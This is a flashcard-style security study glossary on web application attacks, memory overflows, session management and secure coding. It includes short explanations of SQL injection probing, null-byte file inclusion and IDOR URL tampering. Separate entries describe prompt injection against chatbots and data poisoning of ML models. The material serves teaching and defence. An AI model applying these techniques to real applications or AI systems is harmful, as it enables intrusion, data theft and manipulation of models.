Testing for Error Handling and Logging
Testing for Cryptography
Business Logic Testing
Client-side Testing
Testing for Web Services
Testing for Mobile Security
Term
On-Path Attack
Definition
An on-path (formerly known as a man-in-the-middle) attack describes when an attacker intercepts communications between two endpoints to capture their traffic. On-path attacks are accomplished via several methods, but common techniques include ARP spoofing and DNS spoofing (to direct traffic to a malicious website). A practical way to defend against these attacks is to use encrypted communications, such as HTTPS or VPN.
Term
Password spraying
Definition
A brute force attack in which multiple user accounts are tested with a dictionary of common passwords.
Describes when an attacker chooses predetermined passwords and tries them for multiple user accounts. An attacker may be able to collect a list of usernames from a poorly protected directory, and the goal then becomes identifying accounts in the list with breakable or easy-to-guess passwords.
Term
Credential stuffing
Definition
A brute force attack in which stolen user account names and passwords are tested against multiple websites.
Describes the use of credentials stolen from one source and trying them against multiple other sources. This attack is successful because users often use the same credentials in multiple locations.
Term
Broken authentication
Definition
A software vulnerability where the authentication mechanism allows an attacker to gain entry, such as displaying cleartext credentials, using weak session tokens, or permitting brute force login requests.
Broken authentication refers to an app that fails to restrict access to protected resources. This can be caused by many different vulnerabilities, including the following:
No requirement for strong passwords
Vulnerable password reset mechanisms that allow an attacker to reset user passwords
Unintended exposure of credentials or authorization tokens, often caused by hard-coding credentials within the app, cleartext transmission, weak cryptographic methods, or poorly protected credential storage
An app that is vulnerable to session hijacking
Term
input validation
Definition
Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application.
Term
output encoding
Definition
Coding methods to sanitize output created from user input. Output encoding mitigates against injection and XSS attacks that seek to use input to run a script.
Term
parameterized queries
Definition
A technique that defends against SQL injection by incorporating placeholders in a SQL query.
Websites with a database backend should incorporate a technique called parameterized queries to defend against code injection attacks and insecure object references. A parameterized query is a type of output encoding. A query is parameterized when it incorporates placeholders for some of its parameters. Later, when the query is executed, the web app binds the actual values to these parameters in a different statement. So, a quotation mark in a parameterized query would be interpreted as a literal character and not as part of a command operator.
Term
Data Protection
Definition
Secure coding practices ensure that sensitive data is kept confidential and secure. The best practices for secure coding are outlined in several sections within this lesson and include input validation, using encryption, implementing strong authorization and authentication, proper error handling, secure storage of sensitive data, and regular testing and maintenance.
Term
Session Management
Session management is critical to secure coding, as it involves managing user sessions to ensure that users are properly authenticated and authorized.
Definition
Coding Best Practice
Description
Use secure session IDs
Session IDs should be randomly generated, long, and difficult to guess to prevent guessing or brute-forcing session IDs to gain unauthorized access.
Use secure cookies
Cookies should be marked as secure and set to HTTPS-only to prevent them from being intercepted or modified. Developers should ensure that cookies do not contain sensitive information and expire after a reasonable time.
Implement session timeouts
Sessions should end automatically after a predetermined period of inactivity to prevent abuse.
Use strong password policies
Strong password policies prevent attackers from easily guessing or cracking user passwords.
Use multi-factor authentication
Multi-factor authentication provides an additional layer of security by requiring users to provide more than one form of authentication. This significantly reduces the risk of password attacks.
Implement access controls
Restrict access to sensitive resources and prevent unauthorized access. Developers should ensure that access controls protect sensitive resources and data and that users cannot bypass them.
Protect against session hijacking and fixation
Session hijacking and fixation attacks involve stealing or manipulating a user's session ID. Developers must utilize secure session IDs and implement secure cookie-handling practices.
Term
Buffer overflow
Definition
An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code.
Buffer overflow—A buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system.
Heartbleed is a security vulnerability discovered in the widely used OpenSSL cryptographic software library. The bug allows an attacker to read sensitive information from the memory of a vulnerable web server, such as private keys, usernames, passwords, and other confidential data.
Term
heap overflow
Definition
A software vulnerability where input is allowed to overwrite memory locations within the area of a process's memory allocation used to store dynamically sized variables.
The heap is an area of memory allocated by the application during execution to store a variable. The heap can be used to store larger amounts of data than the stack, and variables are globally accessible to the process. A heap overflow can overwrite those variables and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft's GDI+ processing of JPEG images (kb.cert.org/vuls/id/297462). Also, management of objects in the heap is dependent on the process that created the object. Failing to de-allocate memory can cause a memory leak.
Term
integer overflow
Definition
An attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow.
An integer overflow is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. This can cause the program to behave unpredictably, resulting in a security vulnerability if the overflowed value is used in a sensitive calculation or security check.
Term
stack overflow
Definition
A stack overflow vulnerability occurs when a program tries to store more data in the stack than it can handle. The stack is a region of memory that holds temporary data created by a program during runtime. When a function is called, it creates a stack frame that contains information such as local variables, return addresses, and other data. If a program tries to store more data than the stack frame can hold, it can cause a buffer overflow, overwriting adjacent memory and potentially causing the program to crash or execute malicious code. Attackers can exploit stack overflow vulnerabilities to gain control of a system or steal sensitive data. To prevent stack overflow vulnerabilities, developers must ensure that programs allocate enough memory for the stack, use safe programming practices, and use operating systems that utilize address space layout randomization (ASLR).
Term
address space layout randomization (ASLR)
Definition
A technique that randomizes where components in a running application are placed in memory to protect against buffer overflows.
Running software with least privilege can also help prevent this type of attack, as can using an operating system with address space layout randomization (ASLR). ASLR randomizes where components of a running process—the base executable, APIs, the heap, and so on—are placed in memory, which makes it more difficult to aim a buffer overflow at specific points in the address space.
Term
SQL injection
Definition
An attack that injects a database query into the input data directed at a server by accessing the client side of the application.
In a SQL injection attack, an attacker can modify one or more of these four basic functions by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. To identify SQL injection vulnerabilities in a web app, an attacker must test every single input, including elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. One of the most common methods for identifying possible SQL injection vulnerabilities in a web app is to submit a single apostrophe and then look for errors. If an error is returned, the attacker will look to see if it provides them with SQL syntax details that can then be used to construct a more effective SQL injection query. If the single apostrophe returned an error message, the attacker may also try submitting two apostrophes, and if no error is returned, then the input being tested is most likely vulnerable to SQL injection. Attackers may also carry out injections by using the SQL wildcard character (%) to look for a large number of data sets, or they may submit a mathematical expression equivalent to the expected value to expose some vulnerability within the app.
Term
Prompt Injection
Definition
Prompt injection vulnerabilities can pose significant risks to language models and chatbots, which rely heavily on user input. These risks include manipulating the language model's behavior, data theft or leakage, and bias and misinformation. An attacker can inject malicious code or commands into the chatbot's input field, causing it to respond with inappropriate or harmful messages or take actions that compromise privacy or security. Additionally, prompt injection attacks can insert biased or false information into the language model's training data, leading to biased or inaccurate models that produce misleading or harmful results.
One notable example is the Tay chatbot created by Microsoft, which was launched on Twitter in 2016 and quickly became the target of prompt injection attacks. Tay was designed to learn from user interactions and develop sophisticated conversational qualities. Unfortunately, within a few hours of its launch, Tay began responding to user input with racist, sexist, and otherwise offensive messages, prompting Microsoft to shut it down. Attackers deliberately supplied the Tay chatbot with inflammatory and offensive input to manipulate its behavior and responses. The attacks were possible because Tay was vulnerable to prompt injection.
Term
Insecure Object Reference
Definition
A direct object reference is a reference to the actual name of a system object that the application uses. If an attacker is able to manipulate a parameter that directly references an object, the attacker can craft that parameter to grant access to other objects the attacker would normally be unauthorized to access. For example, a call to an SQL database may request account information by directly referencing the acctname parameter. An attacker may replace the acctname parameter with a different account name or number, which would grant them access to that account if the object reference is insecure.
/webpage.php/order?acctname=bob
An attacker can arbitrarily change bob to alice. If the object reference is insecure, the query will still work:
/webpage.php/order?acctname=alice
Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other types of sensitive data.
Term
Extensible Markup Language (XML) Attacks
Definition
Extensible Markup Language (XML) is used by web applications for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code. There are also other types of attack that target the way a server parses an XML file submitted for upload or XML data submitted as a URL:
XML bomb (Billion Laughs attack)—The XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it.
XML External Entity (XXE)—This type of attack embeds a request for a local resource, such as the server's password file.
Term
directory traversal
Definition
An application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory.
Also referred to as file path traversal, directory traversal is a web server vulnerability that allows an attacker to access the operating system files of the system running the web application. An attacker may read or write files to the operating system. When writing files, the attacker is generally seeking to modify the operation of the server in a way that allows them to take control of it.
Term
cross-site scripting (XSS)
Definition
A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones.
Reflected XSS—This type of XSS attack is like the one described above where the attack "bounces" off the web server when the link is clicked.
Persistent XSS—This type of attack occurs when malicious code is injected into a web application's database, which is then executed by all future visitors who view the infected page. This attack type is also known as stored XSS, as the malicious code is stored in the web application's database and executed when a user accesses the affected page. Persistent XSS attacks are particularly dangerous because they can be used to steal sensitive user information, including login credentials or financial data, and can also be used to gain unauthorized access to a web application's database. Web application developers can prevent persistent XSS attacks by implementing proper input validation and sanitization techniques and using secure coding practices.
Term
file inclusion
Definition
A web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor.
Term
remote file inclusion (RFI)
Definition
In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. An attacker could, for instance, force a parameter in a web page to call an external malicious link which includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn't one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file:
In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server's file structure and executes a file. As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to bypass security mechanisms that automatically add a .php suffix to the request. This enables the attacker to access non-PHP files:
Term
cookie
Definition
A text file used to store information about a user when they visit a website. Some sites use cookies to support user sessions.
A cookie is one of those methods. A cookie is created when the server sends an HTTP response header with the cookie. Subsequent request headers sent by the client will usually include the cookie. Cookies are either nonpersistent (or session) cookies, in which case they are stored in memory and deleted when the browser instance is closed, or persistent, in which case they are stored in the browser cache until deleted by the user or pass a defined expiration date.
Term
session hijacking
Definition
A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address.
In the context of a web application, session hijacking most often means exploiting a cookie in some way. An attacker may use a fixed session ID and send that to a target. If the target enters the session (usually under false pretenses), the attacker has access to the session. Normally a cookie can only be used by the server or domain that created it, but this can be subverted by a cross-site scripting attack. Attackers can also sniff network traffic to obtain session cookies sent over an unsecured network, like a public Wi-Fi hotspot. To counter cookie hijacking, you can encrypt cookies during transmission, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.
Term
cross-site request forgery (XSRF)
Definition
A malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser.
Term
Cookie Poisoning
Definition
Cookie poisoning modifies the contents of a cookie after it has been generated and sent by the web service to the client's browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app. To counter cookie poisoning, you should validate the input of your web app to account for tampered-with cookies, encrypt cookies during transmission and storage, and delete cookies from the browser cache when the client terminates the session.
Term
Broken Access Control
Definition
Broken access control is a type of security vulnerability that occurs when a system fails to restrict or limit access to authorized users appropriately. This vulnerability allows unauthorized users to gain access to sensitive or confidential information, modify or delete data, or perform other unauthorized actions.
Term
Server-side request forgery (SSRF)
Definition
An attack where an attacker takes advantage of the trust established between the server and the resources it can access, including itself.
Server-side request forgery (SSRF) describes a type of web application security vulnerability that occurs when an attacker can send unauthorized requests from a vulnerable web application to other internal or external systems to gain unauthorized access. SSRF typically involves an attacker exploiting the web application's ability to send HTTP requests to other systems, which are then abused to instruct "hidden" internal or external systems to provide the attacker with access to protected features or to steal information.
The attack works by manipulating the input of a vulnerable web application to cause it to send an HTTP request to a server of the attacker's choice. The attacker can use this ability to perform a range of malicious activities, such as stealing sensitive data, launching attacks against other systems, or taking control of vulnerable systems.
Term
Some common techniques used to exploit SSRF vulnerabilities include the following:
Definition
An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet.
An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems.
An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks.
Term
To prevent SSRF vulnerabilities, web application developers should consider the following:
Definition
Always validate user input—Ensure that all user input is properly validated and sanitized to prevent attackers from manipulating requests.
Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default.
Firewall and network segmentation—Network segmentation can prevent unauthorized access to internal systems when combined with firewalls to block traffic from unauthorized sources.
Secure coding practices—Developers should follow secure coding practices, such as using well-established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings.
Term
Data Poisoning
Definition
Data poisoning is an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results.
In a data poisoning attack, an attacker deliberately introduces malicious or corrupted data into the training data set used to create or improve an ML model. The attacker may alter the data set to include incorrect or biased data, or they may introduce subtle changes to the data to change the outcome of the ML model in specific ways. By doing so, the attacker can influence the performance of the ML model, potentially causing it to produce incorrect or biased results when used in real-world applications.
Data poisoning attacks can be challenging to detect and prevent, as they generally require very few changes to the data. The effects may only appear once the ML model is used in a real-world application.
Term
Some strategies designed to mitigate the risk of data poisoning attacks include the following:
Definition
Data Validation—Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack.
Data Diversity—Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results.
Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack.
Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning.
Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks.
Term
Data Poisoning Examples
Definition
Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon's Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real-world scenarios.
Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location's data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether.
Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users' inboxes without being flagged as spam.